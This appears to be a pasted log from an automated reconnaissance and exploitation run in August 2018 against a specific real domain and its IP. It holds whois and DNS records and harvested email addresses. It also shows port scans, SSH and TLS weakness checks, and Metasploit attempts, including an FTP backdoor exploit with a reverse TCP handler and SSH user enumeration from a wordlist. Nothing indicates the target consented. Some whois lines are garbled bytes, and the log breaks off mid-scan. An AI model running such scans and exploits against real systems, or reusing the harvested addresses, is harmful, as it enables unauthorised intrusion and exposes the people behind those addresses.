Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################################################################################################################################
- Hostname mississippiwhiteknights.com ISP Affinity Internet, Inc
- Continent North America Flag
- US
- Country United States Country Code US
- Region Unknown Local time 16 Aug 2018 22:08 CDT
- City Unknown Postal Code Unknown
- IP Address 207.150.212.85 Latitude 37.751
- Longitude -97.822
- #######################################################################################################################################
- HostIP:207.150.212.85
- HostName:mississippiwhiteknights.com
- Gathered Inet-whois information for 207.150.212.85
- ---------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 207.89.128.0 - 207.174.215.255
- netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
- descr: IPv4 address block not managed by the RIPE NCC
- remarks: ------------------------------------------------------
- remarks:
- remarks: You can find the whois server to query, or the
- remarks: IANA registry to query on this web page:
- remarks: http://www.iana.org/assignments/ipv4-address-space
- remarks:
- remarks: You can access databases of other RIRs at:
- remarks:
- remarks: AFRINIC (Africa)
- remarks: http://www.afrinic.net/ whois.afrinic.net
- remarks:
- remarks: APNIC (Asia Pacific)
- remarks: http://www.apnic.net/ whois.apnic.net
- remarks:
- remarks: ARIN (Northern America)
- remarks: http://www.arin.net/ whois.arin.net
- remarks:
- remarks: LACNIC (Latin America and the Carribean)
- remarks: http://www.lacnic.net/ whois.lacnic.net
- remarks:
- remarks: IANA IPV4 Recovered Address Space
- remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
- remarks:
- remarks: ------------------------------------------------------
- country: EU # Country is really world wide
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- status: ALLOCATED UNSPECIFIED
- mnt-by: RIPE-NCC-HM-MNT
- mnt-lower: RIPE-NCC-HM-MNT
- mnt-routes: RIPE-NCC-RPSL-MNT
- created: 2018-07-09T15:19:08Z
- last-modified: 2018-07-09T15:19:08Z
- source: RIPE
- role: Internet Assigned Numbers Authority
- address: see http://www.iana.org.
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- nic-hdl: IANA1-RIPE
- remarks: For more information on IANA services
- remarks: go to IANA web site at http://www.iana.org.
- mnt-by: RIPE-NCC-MNT
- created: 1970-01-01T00:00:00Z
- last-modified: 2001-09-22T09:31:27Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.91.2 (ANGUS)
- Gathered Inic-whois information for mississippiwhiteknights.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Domain Name: MISSISSIPPIWHITEKNIGHTS.COM
- Registry Domain ID: 192099484_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.domainpeople.com
- Registrar URL: http://www.domainpeople.com
- Updated Date: 2016-08-12T20:53:12Z
- Creation Date: 2005-08-02T00:16:09Z
- Registry Expiry Date: 2021-08-02T00:16:09Z
- Registrar: DomainPeople, Inc.
- Registrar IANA ID: 65
- Registrar Abuse Contact Email:
- Registrar Abuse Contact Phone:
- Domain Status: clientTransferProhibited https�U@icann����.o�rg/eppɈt=�#cU@lientψt=�Tr�@ansfe�������rProhib�U@ited
- Name Server: ADNS.CS.SITEPROTECT.COM
- Name Server: BDNS.CS.SITEPROTECT.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2018-08-17T03:12:18Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- NOTICE: The expiration date displayed in this record is the date the
- XV@istrar's sponsorship of the domain name regisYV@he re����gi;stry i��t=�s
- currently set to expire. This date does not necessarily reflect the expiration
- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access o�U@r que����ry our Wo�t=�hoU@is
- database through the use of electronic processes that are high-volume and
- automated except as reasonably necessary to register domain names or
- modify existing registrations; the Data in VeriSign Global Registry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons in obtaining information
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois qu�U@ery, ����yo�u agre��t=�e U@to ab�t=�id�U@e
- by the following terms of use: You agree that you may use this Data only
- for lawful purposes and that under no circumstances will you use this Data
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automated, electronic processes
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this �U@Data ����is� expre��t=�ssU@ly
- prohibited without the prior written consent of VeriSign. You agree not to
- use electronic processes that are automated and high-volume to access or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in its sole discretion to ensure
- ����ational stability. VeriSign may restrict or�U@ the
- Whois database for failure to abide by these terms of use. VeriSign
- reserves the right to modify these terms at any time.
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- Gathered Netcraft information for mississippiwhiteknights.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for mississippiwhiteknights.com
- Netcraft.com Information gathered
- Gathered Subdomain information for mississippiwhiteknights.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 possible subdomain(s) for host mississippiwhiteknights.com, Searched 0 pages containing 0 results
- Gathered E-Mail information for mississippiwhiteknights.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host mississippiwhiteknights.com, Searched 0 pages containing 0 results
- Gathered TCP Port information for 207.150.212.85
- ---------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 21/tcp open
- 22/tcp open
- 80/tcp open
- Portscan Finished: Scanned 150 ports, 140 ports were in state closed
- #######################################################################################################################################
- [i] Scanning Site: http://mississippiwhiteknights.com
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title:
- [+] IP address: 207.150.212.85
- [+] Web Server: Apache
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- User-agent: *
- Allow: *
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Date: Fri, 17 Aug 2018 03:24:20 GMT
- [i] Server: Apache
- [i] Last-Modified: Thu, 06 Dec 2007 23:55:57 GMT
- [i] ETag: "40c-440a6df015d40"
- [i] Accept-Ranges: bytes
- [i] Content-Length: 1036
- [i] Connection: close
- [i] Content-Type: text/html
- #######################################################################################################################################
- [?] Enter the target: http://mississippiwhiteknights.com/firstpage.htm
- [!] IP Address : 207.150.212.85
- [!] Server: Apache
- [+] Clickjacking protection is not in place.
- [+] Operating System : Debian
- [!] mississippiwhiteknights.com doesn't seem to use a CMS
- [+] Honeypot Probabilty: 0%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for mississippiwhiteknights.com
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/mississippiwhiteknights.com
- ---------------------------------------------------------------------------------------------------------------------------------------
- API count exceeded - Increased quota available with membership
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- bdns.cs.siteprotect.com. (64.41.114.12) AS7215 Affinity Internet, Inc United States
- adns.cs.siteprotect.com. (64.41.112.12) AS7215 Affinity Internet, Inc United States
- [+] MX Records
- 10 (64.26.60.153) AS20401 Hostway Corporation United States
- [+] Host Records (A)
- mississippiwhiteknights.comHTTP: (207.150.212.85) AS20401 Hostway Corporation United States
- mail.mississippiwhiteknights.com (mx0.mfg.onr.siteprotect.com) (64.26.60.153) AS20401 Hostway Corporation United States
- [+] TXT Records
- [+] DNS Map: https://dnsdumpster.com/static/map/mississippiwhiteknights.com.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- [+] Emails found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- emperor@mississippiwhiteknights.com
- ewk@mississippiwhiteknights.com
- imperialkludd@mississippiwhiteknights.com
- iw@mississippiwhiteknights.com
- pixel-1534475583153454-web-@mississippiwhiteknights.com
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [-] Resolving hostnames IPs...
- 207.150.212.85:Www.mississippiwhiteknights.com
- 64.26.60.153:mail.mississippiwhiteknights.com
- 207.150.212.85:www.mississippiwhiteknights.com
- [+] Virtual hosts:
- ---------------------------------------------------------------------------------------------------------------------------------------
- 207.150.212.85 www.chicagoland
- 207.150.212.85 www.gilpinezo.com
- 207.150.212.85 tarponshores
- 207.150.212.85 rafs.net
- 207.150.212.85 www.cthomasgroup
- 207.150.212.85 shypula
- 207.150.212.85 www.impulsopedagogico.com
- 207.150.212.85 sensiblepsychiatry
- [~] Crawling the target for fuzzable URLs
- [-] No fuzzable URLs found
- #######################################################################################################################################
- [*] Processing domain mississippiwhiteknights.com
- [+] Getting nameservers
- 64.41.114.12 - bdns.cs.siteprotect.com
- 64.41.112.12 - adns.cs.siteprotect.com
- [-] Zone transfer failed
- [+] MX records found, added to target list
- 10 mail.mississippiwhiteknights.com.
- [*] Scanning mississippiwhiteknights.com for A records
- 207.150.212.85 - mississippiwhiteknights.com
- 207.150.212.85 - ftp.mississippiwhiteknights.com
- 64.26.60.153 - mail.mississippiwhiteknights.com
- 64.26.60.229 - pop.mississippiwhiteknights.com
- 64.26.60.229 - smtp.mississippiwhiteknights.com
- 207.150.212.85 - www.mississippiwhiteknights.com
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- mississippiwhiteknights.com -----
- Host's addresses:
- __________________
- mississippiwhiteknights.com. 3443 IN A 207.150.212.85
- Name Servers:
- ______________
- bdns.cs.siteprotect.com. 1002 IN A 64.41.114.12
- adns.cs.siteprotect.com. 1002 IN A 64.41.112.12
- Mail (MX) Servers:
- ___________________
- mail.mississippiwhiteknights.com. 3600 IN A 64.26.60.153
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for mississippiwhiteknights.com on bdns.cs.siteprotect.com ...
- Trying Zone Transfer for mississippiwhiteknights.com on adns.cs.siteprotect.com ...
- brute force file not specified, bay.
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 23:26 EDT
- Nmap scan report for mississippiwhiteknights.com (207.150.212.85)
- Host is up (0.54s latency).
- Not shown: 466 closed ports, 6 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 80/tcp open http
- 443/tcp open https
- Nmap done: 1 IP address (1 host up) scanned in 8.29 seconds
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 23:26 EDT
- Nmap scan report for mississippiwhiteknights.com (207.150.212.85)
- Host is up (0.76s latency).
- PORT STATE SERVICE
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp open|filtered netbios-ns
- 138/udp open|filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Nmap done: 1 IP address (1 host up) scanned in 4.48 seconds
- #######################################################################################################################################
- + -- --=[Port 21 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 23:26 EDT
- Nmap scan report for mississippiwhiteknights.com (207.150.212.85)
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: firewall|general purpose
- Running: Linux 2.4.X|2.6.X, ISS embedded
- OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
- OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 ... 30
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds
- _---------.
- .' ####### ;."
- .---,. ;@ @@`; .---,..
- ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
- '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
- `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
- "--'.@@@ -.@ @ ,'- .'--"
- ".@' ; @ @ `. ;'
- |@@@@ @@@ @ .
- ' @@@ @@ @@ ,
- `.@@@@ @@ .
- ',@@ @ ; _____________
- ( 3 C ) /|___ / Metasploit! \
- ;@'. __*__,." \|--- \_____________/
- '(.,...."/
- =[ metasploit v4.17.3-dev ]
- + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
- + -- --=[ 538 payloads - 41 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- RHOST => mississippiwhiteknights.com
- RHOSTS => mississippiwhiteknights.com
- [+] 207.150.212.85:21 - FTP Banner: '220 Welcome.\x0d\x0a'
- [*] mississippiwhiteknights.com:21 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] mississippiwhiteknights.com:21 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] mississippiwhiteknights.com:21 - Banner: 220 Welcome.
- [*] mississippiwhiteknights.com:21 - USER: 331 Please specify the password.
- [*] Exploit completed, but no session was created.
- [*] Started reverse TCP double handler on 10.211.1.5:4444
- [*] mississippiwhiteknights.com:21 - Sending Backdoor Command
- [*] Exploit completed, but no session was created.
- + -- --=[Port 22 opened... running tests...
- # general
- (gen) banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u7
- (gen) software: OpenSSH 6.0p1
- (gen) compatibility: OpenSSH 5.9-6.0, Dropbear SSH 2013.62+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- # message authentication code algorithms
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-256-96 -- [fail] removed since OpenSSH 6.1, removed from specification
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512-96 -- [fail] removed since OpenSSH 6.1, removed from specification
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 6.0)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
- (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-sha2-256-96 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- (rec) -hmac-sha2-512-96 -- mac algorithm to remove
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-16 23:28 EDT
- Nmap scan report for mississippiwhiteknights.com (207.150.212.85)
- Host is up (0.013s latency).
- PORT STATE SERVICE VERSION
- 22/tcp filtered ssh
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: firewall|general purpose
- Running: Linux 2.4.X|2.6.X, ISS embedded
- OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
- OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 ... 30
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 11.59 seconds
- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
- %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
- %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
- %% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
- %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
- %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
- %%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
- %%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
- %%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
- %%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
- %%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
- %%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
- =[ metasploit v4.17.3-dev ]
- + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
- + -- --=[ 538 payloads - 41 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- USER_FILE => /brutex/wordlists/simple-users.txt
- RHOSTS => mississippiwhiteknights.com
- RHOST => mississippiwhiteknights.com
- [+] 207.150.212.85:22 - SSH server version: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u7 ( service.version=6.0p1 openssh.comment=Debian-4+deb7u7 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Debian os.device=General os.family=Linux os.product=Linux os.version=7.0 service.protocol=ssh fingerprint_db=ssh.banner )
- [*] mississippiwhiteknights.com:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
- [+] 207.150.212.85:22 - SSH server version: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u7 ( service.version=6.0p1 openssh.comment=Debian-4+deb7u7 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Debian os.device=General os.family=Linux os.product=Linux os.version=7.0 service.protocol=ssh fingerprint_db=ssh.banner )
- [*] mississippiwhiteknights.com:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://mississippiwhiteknights.com
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://mississippiwhiteknights.com...
- __________________ SITE INFO __________________
- IP Title
- 207.150.212.85
- ___________________ VERSION ___________________
- Name Versions Type
- Apache Platform
- _________________ INTERESTING _________________
- URL Note Type
- /test.htm Test file Interesting
- /test.html Test file Interesting
- _______________________________________________
- Time: 112.2 sec Urls: 599 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Fri, 17 Aug 2018 03:30:59 GMT
- Server: Apache
- Last-Modified: Thu, 06 Dec 2007 23:55:57 GMT
- ETag: "40c-440a6df015d40"
- Accept-Ranges: bytes
- Content-Length: 1036
- Content-Type: text/html
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://mississippiwhiteknights.com
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginSessionResumption
- PluginCertInfo
- PluginHeartbleed
- PluginCompression
- PluginChromeSha1Deprecation
- PluginOpenSSLCipherSuites
- PluginHSTS
- PluginSessionRenegotiation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- mississippiwhiteknights.com:443 => 207.150.212.85:443
- SCAN RESULTS FOR MISSISSIPPIWHITEKNIGHTS.COM:443 - 207.150.212.85:443
- ---------------------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: VULNERABLE - Server honors client-initiated renegotiations
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 19748f82cd2e883d65570e2fb4ee056c508ca2e7
- Common Name: *.securedata.net
- Issuer: RapidSSL RSA CA 2018
- Serial Number: 04D8CEFFF3C04787DCFA82FDAF7C35CC
- Not Before: Jul 24 00:00:00 2018 GMT
- Not After: Jul 24 12:00:00 2019 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['*.securedata.net', 'securedata.net']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match mississippiwhiteknights.com
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Certificate Chain Received: ['*.securedata.net', 'RapidSSL RSA CA 2018']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * Session Resumption:
- With Session IDs: NOT SUPPORTED (0 successful, 5 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 11.40 S
- -------------------------
- Version: 1.11.11-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 207.150.212.85
- Testing SSL server mississippiwhiteknights.com on port 443 using SNI name mississippiwhiteknights.com
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
